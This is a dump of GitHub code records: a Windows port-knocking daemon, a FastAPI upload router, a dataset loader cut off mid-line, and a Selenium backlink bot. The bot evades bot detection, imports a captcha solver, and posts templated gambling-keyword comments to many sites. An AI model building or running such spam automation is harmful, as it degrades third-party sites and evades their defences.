"pt": "52", "api": [{"api_name": "warnings.filterwarnings", "line_number": 12, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 32, "usage_type": "call"}, {"api_name": "amazoncaptcha.AmazonCaptcha.fromlink", "line_number": 36, "usage_type": "call"}, {"api_name": "amazoncaptcha.AmazonCaptcha", "line_number": 36, "usage_type": "name"}, {"api_name": "bs4.BeautifulSoup", "line_number": 77, "usage_type": "call"}, {"api_name": "re.findall", "line_number": 78, "usage_type": "call"}, {"api_name": "requests.Session", "line_number": 83, "usage_type": "call"}, {"api_name": "time.time", "line_number": 86, "usage_type": "call"}, {"api_name": "pandas.ExcelFile", "line_number": 88, "usage_type": "call"}, {"api_name": "pandas.ExcelWriter", "line_number": 89, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 96, "usage_type": "call"}, {"api_name": "time.time", "line_number": 100, "usage_type": "call"}]} +{"seq_id": "21249895609", "text": "import pydivert\r\nimport argparse\r\nimport subprocess\r\nimport os\r\nimport sys\r\nimport time\r\nimport re\r\nimport copy\r\nfrom dataclasses import dataclass\r\n\r\n# after python 3.7\r\n@dataclass\r\nclass config_entry:\r\n name: str\r\n sequence: list\r\n seq_timeout: int\r\n command: str\r\n protocol: str\r\n\r\n@dataclass\r\nclass candidate:\r\n name: str\r\n start: float\r\n end: float\r\n sequence: list\r\n command: str\r\n protocol: str\r\n src_addr: str\r\n\r\n@dataclass\r\nclass interface:\r\n index: int\r\n name: str\r\n \r\ndef get_parser():\r\n parser = argparse.ArgumentParser(description='Windows Port-knocking Server')\r\n \r\n parser.add_argument('-c', '--config', \r\n default='./knockd.conf',\r\n help='use an alternate config file (default ./knockd.conf)',\r\n type=str)\r\n parser.add_argument('-d', '--debug', \r\n action='store_true',\r\n help='debug mode')\r\n parser.add_argument('-i', '--interface',\r\n nargs='*',\r\n type=int,\r\n help='index of network interface to liston on (default all)')\r\n parser.add_argument('-l', '--list_interface',\r\n action='store_true',\r\n help='list all of the network interface')\r\n return parser\r\n\r\n# global variable\r\ninterface_list = []\r\nselected_interface = []\r\nparser = get_parser()\r\nargs = parser.parse_args()\r\nconfig = {}\r\nall_port = dict()\r\nmatch_queue = []\r\n\r\ndef get_interface():\r\n global selected_interface\r\n output = subprocess.getoutput(\"netsh int ipv4 show interfaces\")\r\n lines = output.split('\\n')\r\n for i, l in enumerate(lines):\r\n value = l.split()\r\n if not value: continue\r\n if i < 3: continue # get ride of useless info\r\n interface_list.append(interface(int(value[0]), ' '.join(value[4:])))\r\n \r\n # list interface\r\n if args.list_interface:\r\n print(f'\\n=========== interface ===========')\r\n for i in interface_list:\r\n print(i)\r\n print(f'=================================\\n')\r\n sys.exit()\r\n \r\n # selected interface\r\n if args.interface:\r\n selected_interface = args.interface\r\n for i in args.interface:\r\n for j in interface_list:\r\n if i == j.index:\r\n break\r\n else: \r\n sys.exit(\"[Error] Selected interface not existied!\")\r\n else:\r\n for i in interface_list:\r\n selected_interface.append(i.index)\r\n if args.debug: print(f\"Selected interface: {selected_interface}\")\r\n \r\ndef read_config():\r\n if args.debug: print(f\"[+] config file: {args.config}\")\r\n try:\r\n config_file = open(args.config, 'r')\r\n except:\r\n sys.exit(\"[Error] Wrong config file location!\")\r\n name = ''\r\n for line in config_file.readlines():\r\n line = line.strip()\r\n if re.search('\\[[a-zA-Z0-9 ]+\\]', line):\r\n name = line.strip(\"[]\")\r\n config[name] = {}\r\n elif line.strip() == '':\r\n continue\r\n elif name != '':\r\n pair = line.split('=', 1) # split at the first symbol of equal\r\n key = pair[0].strip()\r\n value = pair[1].strip()\r\n if key == \"sequence\":\r\n config[name][key] = [ int(s.strip()) for s in value.split(',')]\r\n else:\r\n config[name][key] = value\r\n \r\n if args.debug:\r\n for key in config:\r\n for p in config[key]['sequence']:\r\n all_port[p] = config[key]['protocol']\r\n \r\n if args.debug: \r\n print(f'=========== config ===========')\r\n for i, (key, value) in enumerate(config.items()):\r\n for sub_key, sub_value in value.items():\r\n print(f\"{i} [{key}]: {sub_key}: {sub_value}\")\r\n print()\r\n print(f'==============================')\r\n print(f'All used port: {all_port}\\n')\r\n return config \r\n\r\ndef match_exec(q, packet):\r\n if not q.sequence:\r\n if re.search('\\%[a-zA-Z0-9]+\\%', q.command):\r\n q.command = re.sub(r'\\%[a-zA-Z0-9]+\\%', packet.src_addr, q.command)\r\n os.system(q.command)\r\n if args.debug: print(f\"[+] Execute: {q.command}\")\r\n return True\r\n return False\r\n\r\ndef match_first(start, protocol, packet):\r\n for key, rule in config.items():\r\n if packet.dst_port == rule['sequence'][0] and protocol == rule['protocol']:\r\n tmp = candidate(key, start, start+int(rule['seq_timeout']), rule['sequence'][1:], rule['command'], rule['protocol'], packet.src_addr)\r\n if not match_exec(tmp, packet):\r\n match_queue.append(tmp)\r\n \r\ndef match_seq(start, protocol, packet):\r\n remove_list = []\r\n for q in match_queue:\r\n if q.start == start: continue\r\n if q.end < start: \r\n remove_list.append(q)\r\n continue\r\n if q.sequence[0] == packet.dst_port and packet.src_addr == q.src_addr and protocol == q.protocol:\r\n q.sequence = q.sequence[1:]\r\n if match_exec(q, packet):\r\n remove_list.append(q)\r\n \r\n for q in remove_list:\r\n match_queue.remove(q)\r\n \r\ndef port_knockd():\r\n w = pydivert.WinDivert()\r\n w.open()\r\n while(True):\r\n packet = w.recv()\r\n start = time.time()\r\n if \"INBOUND\" in str(packet.direction) and packet.interface[0] in selected_interface:\r\n \r\n # get protocol\r\n protocol = None\r\n if packet.tcp:\r\n protocol = 'tcp'\r\n else:\r\n protocol = 'udp'\r\n \r\n # debug message\r\n if args.debug:\r\n for key in all_port:\r\n if packet.dst_port == key and protocol == all_port[key]:\r\n print(f\"{time.ctime(start)}: {protocol} {packet.src_addr}:{packet.src_port}->{packet.dst_addr}:{packet.dst_port}\")\r\n \r\n # rule \r\n match_first(start, protocol, packet)\r\n match_seq(start, protocol, packet)\r\n w.send(packet)\r\n w.close()\r\n \r\nif __name__ == \"__main__\":\r\n get_interface()\r\n read_config()\r\n # TODO: hidden window\r\n # Start-Process -verb runAs \"python\" -WindowStyle hidden\r\n port_knockd()", "repo_name": "KJ-black/windows-knock", "sub_path": "knockd.py", "file_name": "knockd.py", "file_ext": "py", "file_size_in_byte": 6401, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "dataclasses.dataclass", "line_number": 12, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 20, "usage_type": "name"}, {"api_name": "dataclasses.dataclass", "line_number": 30, "usage_type": "name"}, {"api_name": "argparse.ArgumentParser", "line_number": 36, "usage_type": "call"}, {"api_name": "subprocess.getoutput", "line_number": 65, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 79, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 89, "usage_type": "call"}, {"api_name": "sys.exit", "line_number": 100, "usage_type": "call"}, {"api_name": "re.search", "line_number": 104, "usage_type": "call"}, {"api_name": "re.search", "line_number": 135, "usage_type": "call"}, {"api_name": "re.sub", "line_number": 136, "usage_type": "call"}, {"api_name": "os.system", "line_number": 137, "usage_type": "call"}, {"api_name": "pydivert.WinDivert", "line_number": 165, "usage_type": "call"}, {"api_name": "time.time", "line_number": 169, "usage_type": "call"}, {"api_name": "time.ctime", "line_number": 183, "usage_type": "call"}]} +{"seq_id": "19494186585", "text": "import os\nimport time\nimport json\nimport random\nfrom datetime import datetime\nimport undetected_chromedriver as uc # Undetected Chrome\nfrom selenium.webdriver.chrome.service import Service\nfrom selenium.webdriver.chrome.options import Options\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.action_chains import ActionChains\nfrom selenium.webdriver.common.proxy import Proxy, ProxyType\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom selenium.common.exceptions import InvalidCookieDomainException, UnableToSetCookieException, TimeoutException\n\n\n# Multiprotcessing\nfrom multiprocessing import Pool\n# Links: Завантаження інструкцій\nfrom baza_links.web2_0 import websites\n# Function: Gmail\nfrom gmail_login import login_to_gmail\nfrom gmail_autorization import gmail_autoriz_fun\n# Function: Captcha\nfrom captcha_img import process_image\n# Function: Формуэмо Частотну фразу Тайтл в Боді\nfrom most_frequent_phrase import most_frequent_phrase\n# Function: OpenAi promt\nfrom def_OpenAi_promt import promt_openai\n\n# База шаблонів коментарів\nfrom baza_template_comments.templ_comments_en import comments_prompt\n\n\n# Нинішній розділ\ncurrent_folder = os.path.basename(os.path.dirname(__file__))\n\n# Дата - вивод в форматі: 10-06-2023\ncurrent_date = datetime.now()\nformatted_date = current_date.strftime('%d-%m-%Y')\n\n# EMAIL Google\nwith open(f'{current_folder}\\\\email\\\\email.json') as json_file:\n email_json = json.load(json_file)\n\n# USER-AGENT\nuser_agent = ['Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.0.0 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.71 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/93.0.4577.63 Safari/537.36',\n 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/92.0.4515.159 Safari/537.36']\n\n# TODO: COOKIES\n# cookies- Шлях до файлу з куками\nCOOKIES_FOLDER_PATH = os.path.join(current_folder, 'cookies')\n# cookies- Функція для завантаження cookies\ndef load_cookies(driver, email):\n try:\n cookie_file = os.path.join(COOKIES_FOLDER_PATH, f'{email}.json')\n if os.path.exists(cookie_file):\n with open(cookie_file, 'r') as file:\n cookies = json.load(file)\n for cookie in cookies:\n # if 'expiry' in cookie:\n # del cookie['expiry']\n try:\n driver.add_cookie(cookie)\n print(f'Cookies loaded for {email}.')\n except (InvalidCookieDomainException, UnableToSetCookieException) as e:\n print((f\"Error loading cookies for {email}: {e}\"))\n continue\n \n except (OSError, IOError):\n print(f\"No cookie file found for {email}.\")\n\n# cookies- Функція для збереження cookies\ndef save_cookies(driver, email):\n cookie_file = os.path.join(COOKIES_FOLDER_PATH, f'{email}.json')\n # Зберігаємо файли cookie у вигляді набору, щоб видалити дублікати\n cookies_set = {json.dumps(cookie) for cookie in driver.get_cookies()}\n # Перетворюємо набір назад у список\n cookies_list = [json.loads(cookie) for cookie in cookies_set]\n with open(cookie_file, 'w') as file:\n json.dump(cookies_list, file)\n print(f'Cookies saved for {email}.')\n\n\n# Функція для виконання інструкцій\ndef execute_instructions(driver, url, instructions, **email_json_info):\n my_wait = WebDriverWait(driver, 10) # ожидание до 10 секунд\n\n # Мій Чистий Сайт без \"https://\" i \"/\"\n site_url = email_json_info['site_url']\n clean_site_url = site_url.split(\"//\")[1].split(\"/\")[0]\n\n # Перехід до веб-сайту\n driver.get(url)\n\n # Текст з тега \n title_text = driver.title\n # Извлекаем текст из body\n body_text = driver.find_element(By.CSS_SELECTOR, \"body\").text\n # Отримуємо самий частотний вираз біграмми і триграмми\n frequent_phrase_title = most_frequent_phrase(title_text, body_text)\n\n # Випадковий ключове слово з поля \"keys\": [\"House\", \"slot game\"]\n random_key_poisk = random.choice(email_json_info[\"keys\"])\n\n # Создаем коментарий из промта\n # comment_ai = promt_openai(site_url, title_url, random_key_poisk)\n comment = random.choice(comments_prompt)\n comment = comment.format(title_url=frequent_phrase_title, key_game=random_key_poisk)\n\n for _ in range(3): # Вводим цикл для повторения до 3 раз\n for instruction in instructions:\n action, code = list(instruction.items())[0]\n\n # Виконуємо код інструкції, використовуючи exec. Зауважте, що це може бути потенційно небезпечно,\n # якщо інструкції не є надійними, оскільки exec виконує будь-який переданий йому код.\n try:\n exec(code)\n except Exception as e:\n print(f\"Error executing instruction '{action}': {e}\")\n continue\n print(f\"Attempted instructions for {url}\")\n \n # Обновляем страницу и ждем ее загрузки\n driver.refresh()\n time.sleep(3) # Даем время странице на загрузку, можно заменить на WebDriverWait, если нужно\n\n # Перевіряємо наявність тексту \"author\" на сторінці\n \n if clean_site_url in driver.page_source:\n # Додаємо URL до файлу, якщо текст знайдено\n with open(f'{current_folder}\\\\final_result_links\\\\{formatted_date}_{clean_site_url}.txt', 'a') as file:\n file.write(f\"{url}\\n\")\n break # Если \"author\" найден, прерываем цикл\n else:\n print(f\"Url not found, retrying for {url}\")\n \n if clean_site_url not in driver.page_source:\n print(f\"Failed to find URL in {url} after 3 attempts\")\n \n\n# Функція для обробки інструкцій\ndef process_instructions(email_json_info):\n # Витягуємо логін і пароль з вхідного словника\n email = email_json_info[\"login\"]\n password = email_json_info[\"password\"]\n\n # Ініціалізуємо веб-драйвер Chrome\n # Chrome Options\n chrome_options = Options()\n chrome_options.add_argument(f\"user-agent={random.choice(user_agent)}\") # User-agent\n # chrome_options.add_argument(\"--blink-settings=imagesEnabled=false\") # Отключение отображения изображений (опционально)\n chrome_options.add_argument(\"--disable-notifications\") # Отключение уведомлений (опционально)\n # Chrome Service\n ser = Service(executable_path = f\"{current_folder}\\\\Webdriver_Chrome\\\\114-0-5735-90\\\\chromedriver.exe\")\n driver = uc.Chrome(service=ser, options=chrome_options) # Undetected Chrome\n driver.maximize_window() # Chrome Вікно відкрити максимально\n\n # TODO: GMAIL - Переходимо на сторінку Gmail\n storinka_gmail_vhid = \"https://mail.google.com\"\n driver.get(storinka_gmail_vhid)\n \n # COOKIES LOAD - Завантажуємо файли cookie\n load_cookies(driver, email)\n time.sleep(1)\n # Оновлюємо сторінку\n driver.refresh()\n time.sleep(2)\n\n # Якщо поточний URL не \"mail.google.com\" виконуємо вхід\n if storinka_gmail_vhid not in driver.current_url:\n login_to_gmail(driver, email, password)\n # Зберігаємо файли cookie після входу в gmail\n save_cookies(driver, email)\n driver.refresh() # Оновлюємо сторінку\n time.sleep(3)\n\n # TODO: Виконуємо інструкції для кожного URL\n for url, instructions in websites.items():\n execute_instructions(driver, url, instructions, **email_json_info)\n # Зберігаємо файли cookie\n save_cookies(driver, email)\n driver.refresh() # Оновлюємо сторінку\n time.sleep(2) # чекаємо, поки сторінка завантажиться\n\n # Закриваємо драйвер\n driver.quit()\n\n\n# Використовуємо бібліотеку multiprocessing, щоб запустити обробку інструкцій для кожної електронної пошти паралельно\n# if __name__ == '__main__':\n# with Pool(5) as p:\n# p.map(process_instructions, email_json.values())\n\n# Без multiprocessing\nif __name__ == '__main__':\n for email_info in email_json.values():\n process_instructions(email_info)", "repo_name": "xxx1285/Deepl_Python", "sub_path": "Linkbilding_Selenium/main8 undetected chrome.py", "file_name": "main8 undetected chrome.py", "file_ext": "py", "file_size_in_byte": 9637, "program_lang": "python", "lang": "uk", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "os.path.basename", "line_number": 37, "usage_type": "call"}, {"api_name": "os.path", "line_number": 37, "usage_type": "attribute"}, {"api_name": "os.path.dirname", "line_number": 37, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 40, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 40, "usage_type": "name"}, {"api_name": "json.load", "line_number": 45, "usage_type": "call"}, {"api_name": "os.path.join", "line_number": 55, "usage_type": "call"}, {"api_name": "os.path", "line_number": 55, "usage_type": "attribute"}, {"api_name": "os.path.join", "line_number": 59, "usage_type": "call"}, {"api_name": "os.path", "line_number": 59, "usage_type": "attribute"}, {"api_name": "os.path.exists", "line_number": 60, "usage_type": "call"}, {"api_name": "os.path", "line_number": 60, "usage_type": "attribute"}, {"api_name": "json.load", "line_number": 62, "usage_type": "call"}, {"api_name": "selenium.common.exceptions.InvalidCookieDomainException", "line_number": 69, "usage_type": "name"}, {"api_name": "selenium.common.exceptions.UnableToSetCookieException", "line_number": 69, "usage_type": "name"}, {"api_name": "os.path.join", "line_number": 78, "usage_type": "call"}, {"api_name": "os.path", "line_number": 78, "usage_type": "attribute"}, {"api_name": "json.dumps", "line_number": 80, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 82, "usage_type": "call"}, {"api_name": "json.dump", "line_number": 84, "usage_type": "call"}, {"api_name": "selenium.webdriver.support.ui.WebDriverWait", "line_number": 90, "usage_type": "call"}, {"api_name": "selenium.webdriver.common.by.By.CSS_SELECTOR", "line_number": 102, "usage_type": "attribute"}, {"api_name": "selenium.webdriver.common.by.By", "line_number": 102, "usage_type": "name"}, {"api_name": "most_frequent_phrase.most_frequent_phrase", "line_number": 104, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 107, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 111, "usage_type": "call"}, {"api_name": "baza_template_comments.templ_comments_en.comments_prompt", "line_number": 111, "usage_type": "argument"}, {"api_name": "time.sleep", "line_number": 129, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.options.Options", "line_number": 153, "usage_type": "call"}, {"api_name": "random.choice", "line_number": 154, "usage_type": "call"}, {"api_name": "selenium.webdriver.chrome.service.Service", "line_number": 158, "usage_type": "call"}, {"api_name": "undetected_chromedriver.Chrome", "line_number": 159, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 168, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 171, "usage_type": "call"}, {"api_name": "gmail_login.login_to_gmail", "line_number": 175, "usage_type": "call"}, {"api_name": "time.sleep", "line_number": 179, "usage_type": "call"}, {"api_name": "baza_links.web2_0.websites.items", "line_number": 182, "usage_type": "call"}, {"api_name": "baza_links.web2_0.websites", "line_number": 182, "usage_type": "name"}, {"api_name": "time.sleep", "line_number": 187, "usage_type": "call"}]} +{"seq_id": "22656749471", "text": "from fastapi import APIRouter, UploadFile, File\n\nfrom services.excel_to_csv import excel_to_csv\n\n# Metadata for the swagger documentation\nrouter = APIRouter(\n prefix=\"\",\n tags=[\"ExcelTOCSV\"]\n)\n\n\n# Include routers\n@router.post(\"/excel_to_csv\", summary=\"Endpoint for excel to csv converter\")\ndef excel_to_csv_api(file: UploadFile = File(...)):\n try:\n contents = file.file.read()\n file_name = f\"Data/{file.filename}\"\n with open(file_name, 'wb') as f:\n f.write(contents)\n except Exception:\n return {\"message\": \"There was an error uploading the file\"}\n finally:\n file.file.close()\n extracted_data = excel_to_csv(file_name)\n return str(extracted_data)\n", "repo_name": "usama124/image-text-extractor", "sub_path": "routers/excel_to_csv_router.py", "file_name": "excel_to_csv_router.py", "file_ext": "py", "file_size_in_byte": 713, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "52", "api": [{"api_name": "fastapi.APIRouter", "line_number": 6, "usage_type": "call"}, {"api_name": "fastapi.UploadFile", "line_number": 14, "usage_type": "name"}, {"api_name": "fastapi.File", "line_number": 14, "usage_type": "call"}, {"api_name": "services.excel_to_csv.excel_to_csv", "line_number": 24, "usage_type": "call"}]} +{"seq_id": "20155313174", "text": "import xml.dom.minidom as minidom\n\nimport os\nimport os.path as osp\nfrom PIL import Image\nimport numpy as np\nimport scipy.sparse\nimport subprocess\nimport pickle as cPickle\nimport uuid\nimport xml.etree.ElementTree as ET\n\nfrom lib.datasets.imdb import imdb\nfrom lib.networks.netconfig import cfg\n\n\nclass siammask_data(imdb):\n def __init__(self, image_set, devkit_path=None):\n imdb.__init__(self, 'siammask_data_' + image_set)\n self._image_set = image_set\n self._devkit_path = self._get_default_path() if devkit_path is None \\\n else devkit_path\n self._data_path = os.path.join(self._devkit_path, 'siammask_data')\n\n self._classes = ['__background__'] + cfg.SIAMSE.CLASSES\n self.defect = cfg.SIAMSE.CLASSES\n self._class_to_ind = dict(zip(self.classes, range(self.num_classes)))\n self._image_ext = '.bmp'\n self._image_index = self._load_image_set_index()\n\n self._roidb_handler = self.gt_roidb\n self.templatedb = self.get_templatedb()\n\n self._shuffle_inds()\n self._salt = str(uuid.uuid4())\n self._comp_id = 'comp4'\n\n # PASCAL specific config options\n self.config = {'cleanup' : True,\n 'use_salt' : True,\n 'use_diff' : False,\n 'matlab_eval' : False,\n 'rpn_file' : None,\n 'min_size' : 2}\n\n assert os.path.exists(self._devkit_path), \\\n 'ZLRMdevkit path does not exist: {}'.format(self._devkit_path)\n assert os.path.exists(self._data_path), \\\n 'Path does not exist: {}'.format(self._data_path)\n\n def cache_path(self):\n cache_path = osp.abspath(osp.join(cfg.SIAMSE.DATA_DIR, 'siammask_data', 'datasets', 'cache'))\n if not os.path.exists(cache_path):\n os.makedirs(cache_path)\n return cache_path\n\n # =====================================取图片=============================================\n def image_path_at(self, i):\n \"\"\"\n Return the absolute path to image i in the image sequence.\n \"\"\"\n return self.image_path_from_index(self._image_index[i])\n\n def image_path_from_index(self, index):\n \"\"\"\n Construct an image path from the image's \"index\" identifier.\n \"\"\"\n image_path = os.path.join(self._data_path, 'datasets', 'ImageSets',\n index + self._image_ext)\n assert os.path.exists(image_path), \\\n 'Path does not exist: {}'.format(image_path)\n return image_path\n\n def _load_image_set_index(self):\n \"\"\"\n Load the indexes listed in this dataset's image set file.\n \"\"\"\n # Example path to image set file:\n # self._devkit_path + /VOCdevkit2007/VOC2007/ImageSets/Main/val.txt\n image_set_file = os.path.join(self._data_path, 'datasets', 'main',\n self._image_set + '.txt')\n assert os.path.exists(image_set_file), \\\n 'Path does not exist: {}'.format(image_set_file)\n with open(image_set_file) as f:\n image_index = [x.strip() for x in f.readlines()]\n return image_index\n\n def _get_default_path(self):\n \"\"\"\n Return the default path where PASCAL VOC is expected to be installed.\n \"\"\"\n return os.path.join(cfg.SIAMSE.DATA_DIR)\n\n\n\n\n # =================================取roi==========================================\n def gt_roidb(self):\n \"\"\"\n Return the database of ground-truth regions of interest.\n\n This function loads/saves from/to a cache file to speed up future calls.\n \"\"\"\n cache_file = os.path.join(self.cache_path(), self.name + '_gt_roidb.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n roidb = cPickle.load(fid)\n print ('{} gt roidb loaded from {}'.format(self.name, cache_file))\n return roidb\n gt_roidb = [self._load_zlrm_annotation(index)\n for index in self.image_index]\n with open(cache_file, 'wb') as fid:\n cPickle.dump(gt_roidb, fid, cPickle.HIGHEST_PROTOCOL)\n print ('wrote gt roidb to {}'.format(cache_file))\n\n return gt_roidb\n\n\n def _load_zlrm_annotation(self, index):\n \"\"\"\n Load image and bounding boxes info from XML file in the PASCAL VOC\n format.\n \"\"\"\n filename = os.path.join(self._data_path, 'Annotations', index + '.xml')\n tree = ET.parse(filename)\n objs = tree.findall('object')\n num_objs = len(objs)\n\n # boxes = np.zeros((num_objs, 4), dtype=np.uint16)\n # gt_classes = np.zeros((num_objs), dtype=np.int32)\n # overlaps = np.zeros((num_objs, self.num_classes), dtype=np.float32)\n # # \"Seg\" area for pascal is just the box area\n # seg_areas = np.zeros((num_objs), dtype=np.float32)\n # ishards = np.zeros((num_objs), dtype=np.int32)\n boxes = []\n gt_classes = []\n overlaps = []\n seg_areas = []\n ishards = []\n\n # Load object bounding boxes into a data frame.\n for ix, obj in enumerate(objs):\n diffc = obj.find('difficult')\n difficult = 0 if diffc == None else int(diffc.text)\n # ishards[ix] = difficult\n\n if (obj.find('name').text in cfg.SIAMSE.CLASSES) and difficult==0:\n bbox = obj.find('bndbox')\n # Make pixel indexes 0-based\n x1 = float(bbox.find('xmin').text) - 1\n y1 = float(bbox.find('ymin').text) - 1\n x2 = float(bbox.find('xmax').text) - 1\n y2 = float(bbox.find('ymax').text) - 1\n\n\n if cfg.SIAMSE.N_CLASSES == 1:\n cls = self._class_to_ind['defect'.lower().strip()]\n else:\n cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n boxes.append([x1, y1, x2, y2])\n gt_classes.append(cls)\n overlap = np.zeros((self.num_classes), dtype=np.float32)\n overlap[cls] = 1.0\n overlaps.append(overlap)\n seg_areas.append((x2 - x1 + 1) * (y2 - y1 + 1))\n ishards.append(difficult)\n\n boxes = np.array(boxes, dtype=np.uint16).reshape((-1, 4))\n gt_classes =np.array(gt_classes, dtype=np.int32).reshape(-1)\n overlaps = np.array(overlaps, dtype=np.float32).reshape((-1, self.num_classes))\n seg_areas = np.array(seg_areas, dtype=np.float32).reshape(-1)\n ishards = np.array(ishards, dtype=np.int32).reshape(-1)\n\n overlaps = scipy.sparse.csr_matrix(overlaps)\n\n return {'boxes': boxes,\n 'gt_classes': gt_classes,\n 'gt_ishard': ishards,\n 'gt_overlaps': overlaps,\n 'flipped': False,\n 'seg_areas': seg_areas}\n\n # =================================取template data==========================================\n def _shuffle_inds(self):\n self._perm = {}\n self._cur = {}\n for classes in self.defect:\n self._shuffle_inds_classes(classes)\n\n def _shuffle_inds_classes(self, classes):\n\n self._perm[classes] = np.random.permutation(np.arange(len(self.templatedb[classes])))\n self._cur[classes] = 0\n\n def _get_next_template_inds(self):\n db_inds = {}\n for classes in self.defect:\n if self._cur[classes] + 1 >= len(self.templatedb[classes]):\n self._shuffle_inds_classes(classes)\n\n db_inds[classes] = self._perm[classes][self._cur[classes]:self._cur[classes] + 1]\n return db_inds\n\n def _get_next_template_minibatch(self):\n \"\"\"Return the blobs to be used for the next minibatch.\n\n If cfg.TRAIN.USE_PREFETCH is True, then blobs will be computed in a\n separate process and made available through self._blob_queue.\n \"\"\"\n\n db_inds = self._get_next_template_inds()\n template = []\n for classes in self.defect:\n template_image = crop_template(self.templatedb[classes][db_inds[classes][0]]['image_path'],\n self.templatedb[classes][db_inds[classes][0]]['boxes'][0:4])\n template.append(template_image)\n\n template = np.stack(template, axis=0)\n\n return template\n\n def template(self):\n \"\"\"Get blobs and copy them into this layer's top blob vector.\"\"\"\n template = self._get_next_template_minibatch()\n # blob字典,有3个元素,im_name、data、label\n return template\n\n # 输出所有的模板\n def template_all(self):\n path = 'D:\\\\jjj\\\\zlrm\\\\data\\\\siammask_data\\\\datasets\\\\template'\n for classes in self.defect:\n print(classes, '开始')\n for i in range(len(self.templatedb[classes])):\n crop_template_(self.templatedb[classes][i]['image_path'],\n self.templatedb[classes][i]['boxes'][0:4], str(i), os.path.join(path, classes))\n\n\n def get_templatedb(self):\n templatedb = {}\n cache_file = os.path.join(self.cache_path(), self.name + '_template_imagedb.pkl')\n if os.path.exists(cache_file):\n with open(cache_file, 'rb') as fid:\n templatedb = cPickle.load(fid)\n print('{} gt templatedb loaded from {}'.format(self.name, cache_file))\n return templatedb\n\n for classes in self._classes:\n templatedb[classes] = []\n for index in self.image_index:\n templatedb[classes] = templatedb[classes] + self._load_template(index, classes)\n\n with open(cache_file, 'wb') as fid:\n cPickle.dump(templatedb, fid, cPickle.HIGHEST_PROTOCOL)\n print('wrote gt roidb to {}'.format(cache_file))\n\n return templatedb\n\n def _load_template(self, index, classes):\n \"\"\"\n Load image and bounding boxes info from XML file in the PASCAL VOC\n format.\n \"\"\"\n filename = os.path.join(self._data_path, 'Annotations', index + '.xml')\n tree = ET.parse(filename)\n objs = tree.findall('object')\n\n template_classes = []\n # Load object bounding boxes into a data frame.\n for ix, obj in enumerate(objs):\n diffc = obj.find('difficult')\n difficult = 0 if diffc == None else int(diffc.text)\n # ishards[ix] = difficult\n\n if difficult==0 and obj.find('name').text == classes:\n template_classes_ = {}\n bbox = obj.find('bndbox')\n # Make pixel indexes 0-based\n x1 = float(bbox.find('xmin').text) - 1\n y1 = float(bbox.find('ymin').text) - 1\n x2 = float(bbox.find('xmax').text) - 1\n y2 = float(bbox.find('ymax').text) - 1\n\n cls = self._class_to_ind[obj.find('name').text.lower().strip()]\n boxes = [x1, y1, x2, y2, cls]\n template_classes_['boxes'] = np.array(boxes, dtype=np.uint16)\n template_classes_['image_path'] = self.image_path_from_index(index)\n template_classes.append(template_classes_)\n\n return template_classes\n\n# 可读取中文路径的图片\ndef imread(file_path):\n im = np.array(Image.open(file_path))\n if len(im.shape) == 2:\n c = []\n for i in range(3):\n c.append(im)\n im = np.asarray(c)\n im = im.transpose([1, 2, 0])\n return im\n\ndef crop_template(image_path, boxes):\n im = Image.open(image_path)\n template_crop = im.crop(boxes)\n w = int(boxes[2] - boxes[0])\n h = int(boxes[3] - boxes[1])\n if h > 120:\n w = int(w / (h / 120))\n h = 120\n if w > 120:\n h = int(h / (w / 120))\n w = 120\n template_resize = template_crop.resize((w,h), Image.ANTIALIAS)\n background = Image.new('L', cfg.SIAMSE.TEMPLATE_IMAGE_SIZE, (138))\n template_resize_arr = np.array(template_resize)\n background_arr = np.array(background)\n\n\n y1 = int(background_arr.shape[0] / 2 - template_resize_arr.shape[0] / 2)\n x1 = int(background_arr.shape[1] / 2 - template_resize_arr.shape[1] / 2)\n y2 = int(y1 + template_resize_arr.shape[0])\n x2 = int(x1 + template_resize_arr.shape[1])\n background_arr[y1:y2, x1:x2] = template_resize_arr\n\n b = Image.fromarray(background_arr.astype(np.uint8))\n outpath = os.path.join('D:\\data', 'test.bmp')\n b.save(outpath)\n\n c = []\n for i in range(3):\n c.append(background_arr)\n background_arr = np.asarray(c)\n background_arr = background_arr.transpose([1, 2, 0])\n background_arr = background_arr.astype(np.float32, copy=False)\n background_arr -= cfg.SIAMSE.PIXEL_MEANS\n return background_arr\ndef crop_template_(image_path, boxes, save_name, path):\n im = Image.open(image_path)\n template_crop = im.crop(boxes)\n w = int(boxes[2] - boxes[0])\n h = int(boxes[3] - boxes[1])\n\n if h >120:\n w = int(w/(h/120))\n h = 120\n if w > 120:\n h = int(h/(w/120))\n w=120\n template_resize = template_crop.resize((w,h), Image.ANTIALIAS)\n background = Image.new('L', cfg.SIAMSE.TEMPLATE_IMAGE_SIZE, (138))\n template_resize_arr = np.array(template_resize)\n background_arr = np.array(background)\n\n\n y1 = int(background_arr.shape[0] / 2 - 